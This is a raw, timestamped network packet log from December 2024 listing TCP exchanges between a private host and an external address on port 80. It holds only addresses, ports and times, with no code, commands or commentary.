Dec 14, 2024 12:56:24.948254108 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.948404074 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.948898077 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.949022055 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.949103117 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.949103117 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.949769974 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.949887037 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.949942112 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.950012922 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.950577021 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.950660944 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.950788021 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.951021910 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.952115059 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.952243090 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.952279091 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.952574968 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.952610016 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.952754974 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.952754974 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.952754974 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.953114033 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.953192949 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.953233957 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.953365088 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.953950882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.954123974 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.954210043 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.954307079 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.954813957 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.954865932 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.955027103 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.955686092 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.955776930 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.956056118 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.956682920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.956773043 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.956782103 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.956873894 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.957339048 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.957391977 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.957490921 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.957490921 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.958163023 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.958219051 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.958264112 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.958415985 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.958993912 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.959098101 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.959244967 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.959842920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.959899902 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.960031033 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.960724115 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.960813999 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.960825920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.961549044 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.961549997 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.961730003 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.961853981 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.961945057 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.962376118 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.962506056 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.962577105 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.962658882 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.963208914 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.963371992 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.963385105 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.963628054 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.964138031 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.964212894 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.964457035 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.964457035 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.964901924 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.964956045 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.965101957 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.965538025 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.965756893 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.965876102 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.965877056 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.965949059 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.966590881 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.966703892 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.966742992 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.967221022 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.967427015 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.967484951 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.967546940 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.968050957 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.968439102 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.968548059 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.968605042 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.968729019 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.969104052 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.969218969 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.969300985 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.970124960 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.970159054 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.970222950 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.970237017 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.970796108 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.970944881 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.971000910 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.971295118 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.971683979 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.972026110 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.972089052 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.972361088 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.972479105 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.972692966 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.972779036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.973136902 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.973309994 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.973438978 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.973503113 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.973736048 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.974324942 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.974525928 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.974584103 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.974823952 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.975064039 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.975100040 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.975352049 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.975352049 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.975964069 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.976037025 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.976075888 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.976300955 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.976830006 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.976919889 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.976975918 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.977022886 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.977790117 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.977823973 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.978115082 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.978496075 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.978530884 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.978590012 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.978893995 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.979269028 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:24.979331017 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:24.987404108 CET	443	49804	23.55.153.106	192.168.2.4
Dec 14, 2024 12:56:25.127522945 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.127573967 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.127671957 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.127711058 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.128679037 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.128741980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.129265070 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.129410982 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.130080938 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.130202055 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.130964994 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.131058931 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.131927967 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.132034063 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.132709026 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.132745028 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.133471966 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.133575916 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.134334087 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.134422064 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.135147095 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.135266066 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.136199951 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.136301041 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.137070894 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.137202024 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.137896061 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.137967110 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.138592958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.138698101 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.139380932 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.139416933 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.140177965 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.140292883 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.141035080 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.141134024 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.141901016 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.142019987 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.142095089 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.142297029 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.142297029 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.142297029 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.142297029 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.142882109 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.142919064 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.142961979 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.143167019 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.143666029 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.143699884 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.143726110 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.144439936 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.144793987 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.144819021 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.145277977 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.145766973 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.145802975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.146097898 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.146323919 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.146387100 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.147099018 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.147119045 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.147133112 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.147330999 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.147612095 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.148137093 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.148171902 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.148484945 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.148627996 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.148742914 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.149460077 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.149638891 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.150341988 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.150765896 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.151501894 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.151849985 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.152137995 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.152311087 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.153141975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.153568029 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.153857946 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.154206038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.154938936 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.154989958 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.155380964 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.155668974 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.156311989 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.156366110 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.157140017 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.157255888 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.157670021 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.157789946 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.157922983 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.157974958 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.158040047 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.158204079 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.158405066 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.158849001 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.159009933 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.159668922 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.159928083 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.160564899 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.160600901 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.161355019 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.161390066 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.162183046 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.162285089 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.163125038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.163157940 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.163901091 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.164060116 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.164844036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.164988995 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.165575027 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.165608883 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.166380882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.166475058 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.167181015 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.167262077 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.168260098 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.168292999 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.168960094 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.168993950 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.169806004 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.169840097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.170563936 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.170721054 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.171340942 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.175643921 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.189122915 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.189122915 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.189122915 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.320056915 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.320127010 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.320164919 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.320200920 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.320223093 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.320223093 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.320611954 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.320837021 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.320888996 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.321120977 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.321649075 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.321698904 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.322419882 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.322455883 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.323096037 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.323236942 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.323370934 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.323376894 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.323553085 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.324059963 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.324184895 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.324850082 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.325016975 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.325668097 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.325817108 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.326499939 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.326591969 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.326592922 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.326642036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.327055931 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.327382088 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.327601910 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.327625036 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.327843904 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.328263044 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.328408003 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.328439951 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.329268932 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.329303980 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.329462051 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.330029011 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.330064058 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.330076933 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.330130100 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.330780983 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.330881119 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.330915928 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.331064939 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.331636906 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.331736088 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.331752062 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.331939936 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.332437038 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.332531929 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.332740068 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.333071947 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.333378077 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.333412886 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.333458900 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.333729982 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.334135056 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.334346056 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.334383965 CET	49796	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:25.335122108 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.335159063 CET	80	49796	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:25.335336924 CET	49796	80	192.168.2.4	185.215.113.16
